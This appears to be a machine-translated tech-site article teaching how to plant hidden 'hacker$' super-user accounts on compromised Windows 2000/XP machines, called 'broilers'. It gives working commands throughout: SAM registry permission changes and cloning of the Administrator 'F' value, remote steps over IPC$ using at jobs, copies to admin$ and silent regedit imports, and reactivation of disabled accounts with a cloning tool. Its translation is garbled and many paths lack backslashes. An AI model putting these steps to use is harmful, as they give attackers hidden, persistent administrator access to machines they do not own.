Shulou(Shulou.com)06/01 Report--

System a variety of ways to hide the super user administrator is how, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

First, how to build a hidden super user in the graphical interface

The graphical interface is suitable for local or open 3389 terminal services on broilers. The author I mentioned above has a good method, but it is more complex, using psu.exe (a program that allows the program to run as a system user) and uploading psu.exe if it is on a broiler. The method I'm talking about will not use the psu.exe program. Because Windows2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and regedt32.exe in XP are actually a program. When you modify the permissions of key values, click "permissions" in the middle of the right button to modify them. I think we are all familiar with regedit.exe, but we cannot set permissions on the keys of the registry, and the biggest advantage of regedt32.exe is that we can set permissions on keys of the registry. The account information of NT/2000/xp is under the HKEY_LOCAL_MACHINESAMSAM key in the registry, but except for the system user SYSTEM, no other user has the right to view the information inside, so I first set the "full control" permission to me with the regedt32.exe SAM key. This allows you to read and write the information in the SAM key. The specific steps are as follows:

1. Suppose we log in to a chicken with Terminal Services as superuser administrator, first set up an account under the command line or in the account manager: hacker$, here I set up this account under the command line

Net user hacker$ 1234 / add

2. Enter: regedt32.exe during start / run and enter to run regedt32.exe.

3. Click "permissions" and the window will pop up later.

Click add to add the account I logged in to the security bar, where I logged in as administrator, so I added administrator and set the permissions to full Control. Need to be explained here: it is best to add your login account or group, do not modify the original account or group, otherwise it will bring a series of unnecessary problems. Wait until the hidden superuser is built, and then come here to delete the account you added.

4, click "start" → "run" and enter "regedit.exe" enter to start the registry editor regedit.exe. Open key:

HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$ "

5, export items hacker$, 00000409, and 000001F4 to hacker.reg, 409.reg, and 1f4.reg, edit the exported files with notepad, copy the value of the key "F" under the item 000001F4 corresponding to the superuser, and overwrite the value of the key "F" under the item 00000409 corresponding to hacker$, and then merge 00000409.reg with hacker.reg.

6. Execute net user hacker$ / del under the command line to delete the user hacker$:

Net user hacker$ / del

7. Press F5 to refresh in the regedit.exe window, and then type File-Import Registry File to import the modified hacker.reg into the registry.

8. At this point, the hidden superuser hacker$ has been built, and then close regedit.exe. Change the HKEY_LOCAL_MACHINESAMSAM key permissions back to their original appearance in the regedt32.exe window (just delete the added account administrator).

9, Note: hidden superuser built, in the account manager can not see the user hacker$, in the command line with the "net user" command can not see, but after the establishment of the superuser, can no longer change the password, if you use the net user command to change the hacker$ password, then in the account manager will see the hidden superuser, and can not be deleted.

Second, how to remotely establish a hidden superuser under the command line

You will use the command of at here, because the scheduled tasks generated with at run as the system, so you don't need the psu.exe program. In order to be able to use the at command, the broiler must have a schedule service. If it is not enabled, you can use the tool netsvc.exe or sc.exe in streamer to start it remotely. Of course, this method can also be used, as long as the schedule service can be started.

For command line mode, you can use a variety of connection methods, such as using SQLexec to connect to port 1433 of MSSQL, or you can use telnet service, as long as you can get a cmdshell and have permission to run the at command.

1. First of all, find a broiler, as for how to find that is not the topic I am talking about here. Let's assume that we find a broiler with a super user of administrator and a password of 12345678, and now we start to remotely create a hidden superuser for it from the command line. (the host in the example is a host in my local area network. I changed its ip address to 13.50.97.238. Please do not seat on the Internet so as not to disturb the normal ip address.)

2. First establish a connection with the broiler, and the command is: net use 13.50.97.238ipc $"12345678" / user: "administrator

3. Use the at command to create a user on the broiler (if the at service is not started, you can use Xiao Rong's netsvc.exe or sc.exe to start it remotely):

At 13.50.97.238 12:51 c:\ winntsystem32net.exe user hacker$ 1234 / add

The user name with the $sign is created because after the $symbol is added, the user will not be displayed with net user on the command line, but can be seen in the account manager.

4. Also use the at command to export the HKEY_LOCAL_MACHINEsamsamDomainsaccountusers key value:

At 13.50.97.238 12:55 c:\ winntregedit.exe / e hacker.reg

HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/ e is the parameter of regedit.exe, and must end with the key _ LOCAL_MACHINESAMSAMDomainsaccountusers. Quote "c:\ winntregedit.exe / e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers" if necessary.

5. Download the hacker.reg on the broiler to this machine and open it in notepad to edit the command:

Copy 13.50.97.238admin$system32hacker.reg c:\ hacker.reg

The method of modification has been introduced in the graphics world, so it will not be introduced here.

6. Copy the edited hacker.reg back to the broiler

Copy c:\ hacker.reg 13.50.97.238admin$system32hacker1.reg

7. Check the broiler time: net time 13.50.97.238 and then delete the user hacker$ with the at command:

At 13.50.97.238 13:40 net user hacker$ / del

8. Verify whether the hacker$ is deleted: use

Net use 13.50.97.238 / del was disconnected from broilers.

Net use 13.50.97.238ipc$ "1234" / user: "hacker$" uses the account hacker$ to connect with the broiler, which means that the connection has been deleted.

9. Establish a connection with the broiler: net use 13.50.97.238ipc $"12345678" / user: "administrator"

Then get the broiler time, and import the copied hacker1.reg into the broiler registry with the at command:

At 13.50.97.238 13:41 c:winntregedit.exe / s hacker1.reg

The parameter / s of regedit.exe refers to quiet mode.

10. Verify whether the hacker$ has been established in the same way as above to verify whether the hacker$ has been deleted.

11, and then verify whether the user hacker$ has read, write, delete permissions, if you are not assured, you can also verify whether you can set up other accounts.

12. Through 11, we can conclude that user hacker$ has super user privileges, because I was an ordinary user when I first set it up with the at command, but now I have remote read, write and delete permissions.

Third, what if the broiler does not open 3389 terminal services and I do not want to use the command line?

In this case, you can also use the interface to remotely create hidden superusers for broilers. Because both regedit.exe and regedt32.exe have the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host and regedit.exe to edit the remote registry. The account Manager also has a function that connects to another computer, and you can use the account Manager to create and delete accounts for remote hosts. The specific steps are similar to those introduced above, I will not say much, but its speed is really unbearable.

There are two prerequisites here: 1, use net use broiler ipipc$ "password" / user: "super user name" to establish a connection with the remote host before you can use regedit.exe regedt32.exe and account manager to connect with the remote host.

2. The remote host must open the remote registry service (if it is not enabled, you can also open it remotely because you have the super user's password).

Fourth, use disabled accounts to create hidden superusers

1. Want to check which users are prohibited by careful administrators. In general, some administrators will disable guest for security reasons, and of course, other users will be disabled. In the graphical interface, it is very easy to see a red cross on the disabled account in the account Manager, but under the command line, I have not thought of a good way to use the command line: "net user username" one by one to see if the user is disabled.

two。 Here, we assume that the user hacker is disabled by the administrator. First of all, I used Xiao Rong's supergroup user cloning program CA.exe to clone the disabled user hacker into a superuser (after cloning, the disabled user hacker will be automatically activated): CA.EXE broiler ip Administrator superuser password hacher hacher password.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.